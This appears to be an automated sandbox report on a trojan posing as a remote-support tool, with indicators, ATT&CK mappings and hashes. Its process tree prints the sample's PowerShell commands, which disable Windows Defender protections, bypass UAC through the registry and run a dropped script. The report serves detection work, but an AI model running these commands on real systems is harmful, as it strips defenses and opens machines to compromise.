d77dbba4337c1769c5378dda33c2df4481ed899808b4c4fc49e6ee1f34636e64

Resubmissions

04/08/2023, 21:18

230804-z5218aed85 10

04/08/2023, 21:14

230804-z3jrvsed67 10

Analysis

max time kernel
41s
max time network
102s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
04/08/2023, 21:18

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Helper-Remote-SupportExternConnect.exe
Size

6.6MB
MD5

efb7743696693a14b375bd967074fa6a
SHA1

cddb5eae19339af8410bace602c9a04752b8d4d9
SHA256

d77dbba4337c1769c5378dda33c2df4481ed899808b4c4fc49e6ee1f34636e64
SHA512

fcb7c183428ad27a0b709558e8fc3eb25528038110c767deb48b8602ce5e45bddb13eafcb260b59ff9b949b6541004f262274b06e025b053aefbcc7701e0c046
SSDEEP

98304:o9zTX4Pf1N2zIh3ET9Y9MxVMOPUh3PdWPEUrJY6AOxbHPS2zh/hQqfvsJ1YPwIu/:oxX4FMIZETKwjPePdrQJ/BNOqAYPL

Score

10^/10

evasion trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
11	3384	powershell.exe

Loads dropped DLL 4 IoCs

pid	Process
2960	Helper-Remote-SupportExternConnect.exe
2960	Helper-Remote-SupportExternConnect.exe
2960	Helper-Remote-SupportExternConnect.exe
2960	Helper-Remote-SupportExternConnect.exe

Modifies registry class 20 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	firefox.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
1172	powershell.exe
1696	powershell.exe
1696	powershell.exe
1172	powershell.exe
3384	powershell.exe
3384	powershell.exe
2796	powershell_ise.exe
2796	powershell_ise.exe
2796	powershell_ise.exe
2796	powershell_ise.exe
2796	powershell_ise.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	1172	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	3384	powershell.exe
Token: SeDebugPrivilege	2796	powershell_ise.exe
Token: SeDebugPrivilege	4504	firefox.exe
Token: SeDebugPrivilege	4504	firefox.exe
Token: SeDebugPrivilege	4504	firefox.exe
Token: SeDebugPrivilege	4504	firefox.exe
Token: SeDebugPrivilege	4504	firefox.exe
Token: SeDebugPrivilege	4504	firefox.exe
Token: SeDebugPrivilege	4504	firefox.exe
Token: SeDebugPrivilege	4504	firefox.exe
Token: SeDebugPrivilege	4504	firefox.exe
Token: SeDebugPrivilege	4504	firefox.exe
Token: SeDebugPrivilege	4504	firefox.exe
Token: SeDebugPrivilege	4504	firefox.exe
Token: SeDebugPrivilege	4504	firefox.exe
Token: SeDebugPrivilege	4504	firefox.exe
Token: SeDebugPrivilege	4504	firefox.exe
Token: SeDebugPrivilege	4504	firefox.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
4504	firefox.exe
4504	firefox.exe
4504	firefox.exe
4504	firefox.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4504	firefox.exe
4504	firefox.exe
4504	firefox.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4504	firefox.exe
4504	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1096 wrote to memory of 2960	1096	Helper-Remote-SupportExternConnect.exe	85
PID 1096 wrote to memory of 2960	1096	Helper-Remote-SupportExternConnect.exe	85
PID 2960 wrote to memory of 4228	2960	Helper-Remote-SupportExternConnect.exe	87
PID 2960 wrote to memory of 4228	2960	Helper-Remote-SupportExternConnect.exe	87
PID 4228 wrote to memory of 1172	4228	cmd.exe	89
PID 4228 wrote to memory of 1172	4228	cmd.exe	89
PID 2960 wrote to memory of 2620	2960	Helper-Remote-SupportExternConnect.exe	90
PID 2960 wrote to memory of 2620	2960	Helper-Remote-SupportExternConnect.exe	90
PID 2620 wrote to memory of 1696	2620	cmd.exe	93
PID 2620 wrote to memory of 1696	2620	cmd.exe	93
PID 2960 wrote to memory of 4896	2960	Helper-Remote-SupportExternConnect.exe	95
PID 2960 wrote to memory of 4896	2960	Helper-Remote-SupportExternConnect.exe	95
PID 4896 wrote to memory of 3384	4896	cmd.exe	97
PID 4896 wrote to memory of 3384	4896	cmd.exe	97
PID 3664 wrote to memory of 4504	3664	firefox.exe	111
PID 3664 wrote to memory of 4504	3664	firefox.exe	111
PID 3664 wrote to memory of 4504	3664	firefox.exe	111
PID 3664 wrote to memory of 4504	3664	firefox.exe	111
PID 3664 wrote to memory of 4504	3664	firefox.exe	111
PID 3664 wrote to memory of 4504	3664	firefox.exe	111
PID 3664 wrote to memory of 4504	3664	firefox.exe	111
PID 3664 wrote to memory of 4504	3664	firefox.exe	111
PID 3664 wrote to memory of 4504	3664	firefox.exe	111
PID 3664 wrote to memory of 4504	3664	firefox.exe	111
PID 3664 wrote to memory of 4504	3664	firefox.exe	111
PID 4504 wrote to memory of 1692	4504	firefox.exe	112
PID 4504 wrote to memory of 1692	4504	firefox.exe	112
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113
PID 4504 wrote to memory of 1752	4504	firefox.exe	113

C:\Users\Admin\AppData\Local\Temp\Helper-Remote-SupportExternConnect.exe
"C:\Users\Admin\AppData\Local\Temp\Helper-Remote-SupportExternConnect.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1096
- C:\Users\Admin\AppData\Local\Temp\Helper-Remote-SupportExternConnect.exe
  "C:\Users\Admin\AppData\Local\Temp\Helper-Remote-SupportExternConnect.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start /min powershell -ExecutionPolicy Bypass -noprofile -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4228
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -noprofile -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start /min powershell -ExecutionPolicy Bypass -noprofile -c "Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -noprofile -c "Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0"
      4⤵
      UAC bypass
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start /min powershell -ExecutionPolicy Bypass -noprofile C:\Users\Admin\AppData\Local\Temp/RemoteSupport/remote-connect.exe.ps1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -noprofile C:\Users\Admin\AppData\Local\Temp/RemoteSupport/remote-connect.exe.ps1
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3384

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
1⤵
PID:2980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3664
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4504
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4504.0.89398619\547883436" -parentBuildID 20221007134813 -prefsHandle 1872 -prefMapHandle 1864 -prefsLen 20938 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {054422f6-36ff-4551-bd83-ac3b796d9d6d} 4504 "\\.\pipe\gecko-crash-server-pipe.4504" 1952 2428b0cae58 gpu
    3⤵
    PID:1692
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4504.1.1340209380\1268227721" -parentBuildID 20221007134813 -prefsHandle 2396 -prefMapHandle 2392 -prefsLen 20974 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1000900-dac6-4ed7-b2a4-8875469fbba1} 4504 "\\.\pipe\gecko-crash-server-pipe.4504" 2408 2428abe4758 socket
    3⤵
    PID:1752
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4504.2.1934698786\1878463168" -childID 1 -isForBrowser -prefsHandle 2972 -prefMapHandle 3032 -prefsLen 21077 -prefMapSize 232675 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd4ba879-e410-4a72-99ff-2bda91672a7a} 4504 "\\.\pipe\gecko-crash-server-pipe.4504" 2968 2428ed84858 tab
    3⤵
    PID:2996
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4504.3.1534586370\23960810" -childID 2 -isForBrowser -prefsHandle 3560 -prefMapHandle 3556 -prefsLen 26437 -prefMapSize 232675 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {78002191-8eb6-4e4d-8146-26870a79860a} 4504 "\\.\pipe\gecko-crash-server-pipe.4504" 3568 2428fc42658 tab
    3⤵
    PID:3640
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4504.4.1831056596\2024885817" -childID 3 -isForBrowser -prefsHandle 4504 -prefMapHandle 4500 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e73a296-b00b-4f6c-89b2-cf3b4d515fdc} 4504 "\\.\pipe\gecko-crash-server-pipe.4504" 4192 24290ce0958 tab
    3⤵
    PID:2028
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4504.5.1790663657\2132135639" -childID 4 -isForBrowser -prefsHandle 4996 -prefMapHandle 5012 -prefsLen 26577 -prefMapSize 232675 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f00e3e9b-d510-492d-a55b-142c7ee5406b} 4504 "\\.\pipe\gecko-crash-server-pipe.4504" 4976 242914bc758 tab
    3⤵
    PID:5556
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4504.6.671164369\1958300312" -childID 5 -isForBrowser -prefsHandle 5088 -prefMapHandle 5092 -prefsLen 26577 -prefMapSize 232675 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {718a850c-a93f-4ed0-a2f5-fe00f64b8888} 4504 "\\.\pipe\gecko-crash-server-pipe.4504" 5000 242914bee58 tab
    3⤵
    PID:5564
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4504.7.877012997\284428685" -childID 6 -isForBrowser -prefsHandle 5300 -prefMapHandle 5304 -prefsLen 26577 -prefMapSize 232675 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {76f98232-fe38-491d-b408-9f24314dc5ac} 4504 "\\.\pipe\gecko-crash-server-pipe.4504" 5012 242914be858 tab
    3⤵
    PID:5584
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4504.8.671759539\456557879" -childID 7 -isForBrowser -prefsHandle 2872 -prefMapHandle 4824 -prefsLen 26656 -prefMapSize 232675 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dcc8e8ec-b929-4c65-a0a8-841c08e0d206} 4504 "\\.\pipe\gecko-crash-server-pipe.4504" 5944 2428d593e58 tab
    3⤵
    PID:5952
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4504.9.1923894146\263967154" -childID 8 -isForBrowser -prefsHandle 5324 -prefMapHandle 4560 -prefsLen 26831 -prefMapSize 232675 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8430a347-17ba-4767-b44b-6a18f1335a5e} 4504 "\\.\pipe\gecko-crash-server-pipe.4504" 5336 242919d9558 tab
    3⤵
    PID:4572
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4504.10.2001831213\454567051" -childID 9 -isForBrowser -prefsHandle 6056 -prefMapHandle 6060 -prefsLen 26831 -prefMapSize 232675 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dfa90565-86f9-48b3-a4a6-a4e4bc65e6ce} 4504 "\\.\pipe\gecko-crash-server-pipe.4504" 4552 242919d6e58 tab
    3⤵
    PID:1468
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4504.11.1953024495\2018788622" -childID 10 -isForBrowser -prefsHandle 6336 -prefMapHandle 6332 -prefsLen 26831 -prefMapSize 232675 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5320649-105c-4a0d-88a6-93ef34de169b} 4504 "\\.\pipe\gecko-crash-server-pipe.4504" 6344 24292a14858 tab
    3⤵
    PID:5008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a2568184602a24d6d7e5635d5fb43c1a

SHA1
8e8d6e16fdffe8bfb08cd4719c8f580b5726fa88

SHA256
ebc0321a4380b744905115a7a094124ad878173f5942d01ece951142c91efbd6

SHA512
af47d87f6ffb1b14b6493d26cec46fe085306b40ad2b4506168a84267998ce052897c68fa90c9c422842c1aaa27a0ee31859a5df7ef5c8cd695a2101e6805d95

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
149d8ea75129b5bac13935c6f7ee2b40

SHA1
ec14c55a848e3dd28e474e8a67276589022ee5fa

SHA256
e4a07720c6d373c2e2e13ca98e4ccc169d6bf4fa15df35fef9a4d69185e023bd

SHA512
fb65b85dc3f4341dbf6640355c25238f31fade0547fc6214f7c83d70f6d98f05fa43a6fe7c1ec9e9454a463d482eb77efca0dbccc157baabd15bf89c865e27bc

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vjiou3c0.default-release\activity-stream.discovery_stream.json.tmp

Filesize
144KB

MD5
b14e0c57212112fc71b7e45e7a18a9d9

SHA1
4e84bf8c1677574cfcb381c3164bdb8fffaddc95

SHA256
0b211349c026bf391c7f88863a472a1c8f006c81fba33a617aaf2d29ac9897f0

SHA512
2929e42b7df7437127a517f1f4602c96e54ec54d837c33cf4559501d997c20ef07fc755617f9f51cc0236a8fb388d5a0d172f55660aa7fc1e6d9c318d38d3d78

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vjiou3c0.default-release\cache2\doomed\10585

Filesize
9KB

MD5
718892124f0c4eda2a5a19f0036eb29d

SHA1
734963821238bf19ac14572ccba73d5874ee110d

SHA256
e74c89ec83931fc4e86ed558ebd0279a441cc4f6d8ab56df4272aea68d85c7c8

SHA512
f61e65137b1e64b3d55937daf49140de7d9e1f2e8e7218bb804bec0a10d6eb808824aca23c8dbadd8dc1d13db76487c4a9039150bd2ca8608a6e748f6ba041ec

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vjiou3c0.default-release\cache2\doomed\10917

Filesize
9KB

MD5
5690232f7ab7ad377398f92cd19a78fb

SHA1
9c85d02965961c2add1ce7407cc441f0ba51fd05

SHA256
db4145c6dcc47482a1631345946682f4402a48e9945d51f92f23a67fbaaea1e2

SHA512
bb7f3e093414ded94cc9594ba9fa5557b362c019c431b2124e4464157eca1b36a08f939f686b449ad2cace2e323db9d3792f3dd88b3f287f99e0402d7e720b71

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vjiou3c0.default-release\cache2\doomed\11768

Filesize
10KB

MD5
19d6ea04eb0f242099490f2f33bd6c94

SHA1
daff4ba2f2b177e190238149ecd8c9d973fdd5e7

SHA256
94703917f098d875cc4eb6f02c5a60fb4a16147302d6978471a849bc6c72922e

SHA512
caf610ae54dee03b41ac97f44735d6b6206fa208d00b43a3c604d71d82e8741947ea1b0d54d888e04dda6375346c4758a4fc1298d5c50dfdd4b902ae95144957

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vjiou3c0.default-release\cache2\doomed\16425

Filesize
8KB

MD5
94bb1ab015db1df79b8aa87169e581f5

SHA1
7f9c3ebece7d142dc98a3ac839d549d3603df4d2

SHA256
efcea1361248bafc615be712570760f9d37e58b00836e58ff60e9b4401aec02a

SHA512
b0cda03acc2fb8b682bc83a236048f168d11b9c801244eb57198bea7d615152ea62e90f9e48aeb307369790f8c1c3b3e16634d3124ec886450c88cd19db2894a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vjiou3c0.default-release\cache2\doomed\17943

Filesize
10KB

MD5
566e6880414fcec1a499bb39eeb842f6

SHA1
ee844d5618337b9050102e19a3d1f2718bdbf5cd

SHA256
2aa93a0f4aec4e97441325a22bb318a251e06860b8863a7a9b82d25b1019d2c3

SHA512
823cb89abed53e03db291a613b8fe7a01720d5ae4afe5d7da1f364865352c4d468a03f20b1806365a1907ae42f7ee98fa9832bff9b0cb13632fc944a281aafcd

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vjiou3c0.default-release\cache2\doomed\22174

Filesize
9KB

MD5
bb1060b56a3a9444d50cbfb775eec8cb

SHA1
09cd96228602ea51782529f7e931dfb673d4b7df

SHA256
5cac423b8d91cdc3df4244b856acf3fd5fd7f4d078647f29399efc8d79185a03

SHA512
2f1b3b49c95f44fa67a0a6fe775aab1b80a2f83520282878c92a21532d347402cd231894505d5a523b0a313c5b1ea2a33f12d06492387e750117ebb70e27ea9f

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vjiou3c0.default-release\cache2\doomed\22535

Filesize
10KB

MD5
5172a09e91fdb82bf8bd4650d664a030

SHA1
d0a439fce1403434b27684658a078018335a7336

SHA256
c16d17631c38bfada26b9898c12bba2c69de1782b6a064651d253c62abfb62c9

SHA512
5fe0c3544307e45b82e2d8f53b0fb6b2df9eb5ca2172694e3182a262152cad734e9237f03840f28d5abdec50b7923657902940dd39d0864b6a367c12afea3179

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vjiou3c0.default-release\cache2\doomed\26322

Filesize
10KB

MD5
6edba56dd052d84d0a3dfe524ba6200c

SHA1
63c89e6902ea9f92aebb9a467b223b7577d785f9

SHA256
e095bd31692b7ab950957c042600afc50bb9715e834796bf3ae74dde276a0a38

SHA512
8fdd6c988a3a94518ce41bac15e26a1a948fed7002adbd9bdb1595b9f2fe8c5e69724bae256ad621f1472d110c8b373d3a628ddc967e227cd74fc58388f4a8e8

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vjiou3c0.default-release\cache2\doomed\28563

Filesize
41KB

MD5
d87c7f45fca6a535b17ff94bd6ba3d8a

SHA1
15439f41821136f50a189849ee636e336c43871e

SHA256
98332020f5972e2a9592c6e44d14c54182a4e2ece3f21898f136ad253f11df07

SHA512
f80d9f6d0c9be989fce6ccc684be3eee6160797412df6b2ecefc53bbb70f545d6f69f67d7da04622240605629c561cefe229ce1e70f335f5035de8e9895fe433

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vjiou3c0.default-release\cache2\doomed\29271

Filesize
10KB

MD5
f4f1a2e4baa4c28c81baee8a4370c315

SHA1
483b7581c73d8c62cecc8d67bb1434c6298d2c77

SHA256
47473c3af0ccfd0341f705e1fb4f3d651b8422d09f67a5ce54cf71f3388a7237

SHA512
4b68bee7f7c04fc3d0186ddf35358564f6b80011fc75baeb7d09a681a05c65eb894e9a5907185b49fef644edd92390444180a7a88a256e88e29cc98dd70f139c

Download Submit
